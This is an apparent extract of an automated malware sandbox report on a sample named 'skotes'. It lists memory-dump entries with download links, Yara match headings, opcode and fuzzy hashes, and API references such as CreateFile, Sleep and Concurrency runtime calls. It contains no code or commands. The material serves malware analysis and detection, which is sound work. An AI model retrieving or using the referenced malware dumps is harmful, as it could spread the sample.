                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: 73c68813801de450a3ab1342399ed27586e805e90946c2450176a7e9b33974ae
                                                                                                                                                                                                                                              • Instruction ID: 8e51191d50f3f757cd790be834b10e40acf90c82cd29ff2fce657d3dd869bfbb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73c68813801de450a3ab1342399ed27586e805e90946c2450176a7e9b33974ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9D0923214010DBBDF129E85DC06EDA3BAAFB48714F014100BE1C66020C732E832AF95
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                                              • Opcode ID: f6e36cbd804148e8ba1aa2574a92d5b7143c2cf63dcf076adbf038c3acf9e15b
                                                                                                                                                                                                                                              • Instruction ID: 370c9a33865fb8efd2fc23292fa0d53ec47164b5603e2eaef9c76ee99e1bbaa8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6e36cbd804148e8ba1aa2574a92d5b7143c2cf63dcf076adbf038c3acf9e15b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6F0F971A10640A7CB117B699C03B0EBBB5EB06760F900398E412673D1EB301A0447D2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3490159802.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_5440000_skotes.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 917be1a2dee4fe447be2ba27fe097b8a2d5a88f6cb0730e00788df383d0d85be
                                                                                                                                                                                                                                              • Instruction ID: 2ed073bd6783a21ebf4fc0deb7b94b1f1261d3d341b02eee7ffe97e588a06bd2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 917be1a2dee4fe447be2ba27fe097b8a2d5a88f6cb0730e00788df383d0d85be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE0161A708C124FDB14981422B1CAF767BFE6D27313348417FA4BDD501D6990A6B6875
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3490159802.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_5440000_skotes.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f9dddc77e22df5fc63e4f4d0bb034b8f917f7a8650e75d2933d47cfe96463be2
                                                                                                                                                                                                                                              • Instruction ID: ee132ec5b74606915520ff41dfdb7858a7c346e72030f6fe216e312ab7bffbd0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9dddc77e22df5fc63e4f4d0bb034b8f917f7a8650e75d2933d47cfe96463be2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F0F8D66CD1E5BD3082C0D21A1CEF62A1FD0D67783314427BA0F9EA41D2944A6B58BA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3490159802.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_5440000_skotes.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 231df2d6e16a0de5ee3d54250120b012f86b3ebfbeaf6e843d8a819b07b71a40
                                                                                                                                                                                                                                              • Instruction ID: 1739e94be7b37ad2eb4566100f5b2b62612b9e0695da7b11692a3a5198f27629
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 231df2d6e16a0de5ee3d54250120b012f86b3ebfbeaf6e843d8a819b07b71a40
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F0BEBB0CC220FDB25CD542671D6F66AFBA2913303304507FB4F8D90182590ABB5825
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3490159802.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_5440000_skotes.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0dec7260541c4c402274137dc89226546431bc44a2a524981cb314bdffc00016
                                                                                                                                                                                                                                              • Instruction ID: 4fb45bb7f90e1da82981af94905ef053a7f4cad2312b0e72697326557f1ba528
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dec7260541c4c402274137dc89226546431bc44a2a524981cb314bdffc00016
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21E06DAB4C8320E9B25DD112271E3F2AAFB77626313200503BB8F5D941569946B76865
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3490159802.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_5440000_skotes.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2698eb506396ea89f33a9059c13867cfe0ebe419575386e0272f385f358eb0af
                                                                                                                                                                                                                                              • Instruction ID: 1c1528d9932403f0b12779d36ad9fda3fd520b714eb6906f6be7cee292374367
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2698eb506396ea89f33a9059c13867cfe0ebe419575386e0272f385f358eb0af
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F05CA39CD390D6E3169670214D1F07FF2241313232D88E3C64FCE443D0458167D722
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3490159802.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_5440000_skotes.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 55e7a95aaeddeb42844215cd651e5485633fcaf773383bca71e2b3269813ce2e
                                                                                                                                                                                                                                              • Instruction ID: 552a802aea22eee32c230ebf307d3f012353470b1030ebfcb411f591a35c353f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55e7a95aaeddeb42844215cd651e5485633fcaf773383bca71e2b3269813ce2e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97E0DFA74CC324E9B25CE612530E3F266FB73A23213200103AB8F8E941425D09F7AC29
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3490159802.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_5440000_skotes.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a0e65d9cbeda0eeda8a64711337e678fc2b73cc45e2af8ceb95cb3bf075f960d
                                                                                                                                                                                                                                              • Instruction ID: a38d4ff0fc8ad81058bc66e67306d367deadc82d6ecc8d6d50e5bb0ac554c420
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0e65d9cbeda0eeda8a64711337e678fc2b73cc45e2af8ceb95cb3bf075f960d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02B09B374C9414D67058D551251E3F577F575902113D44543E74FCF8408555407BFD61
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BF0F16
                                                                                                                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BF0F62
                                                                                                                                                                                                                                                • Part of subcall function 00BF265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00BF2750
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00BF0FCE
                                                                                                                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BF0FEA
                                                                                                                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BF103E
                                                                                                                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BF106B
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00BF10C1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                                                              • API String ID: 2943730970-3887548279
                                                                                                                                                                                                                                              • Opcode ID: cc7e620d30c8e3effd4e90dcd3d2979da5d5d8956008e4bd020305d4e62d7e88
                                                                                                                                                                                                                                              • Instruction ID: 6cd3d1c8f5b6decb79f0139e0c99f2c89fe8fa306a0288b4a0c99116cdf5e95f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7e620d30c8e3effd4e90dcd3d2979da5d5d8956008e4bd020305d4e62d7e88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00B15BB0A10619EFDB28DF68D991B7EB7F4FF44304F1445A9EA05AB291D730AD84CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00BF2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00BF2D0F
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00BF1614
                                                                                                                                                                                                                                                • Part of subcall function 00BF2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00BF2E39
                                                                                                                                                                                                                                                • Part of subcall function 00BF2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00BF2EA8
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00BF1746
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00BF17A6
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00BF17B2
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00BF17ED
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00BF180E
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00BF181A
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00BF1823
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00BF183B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
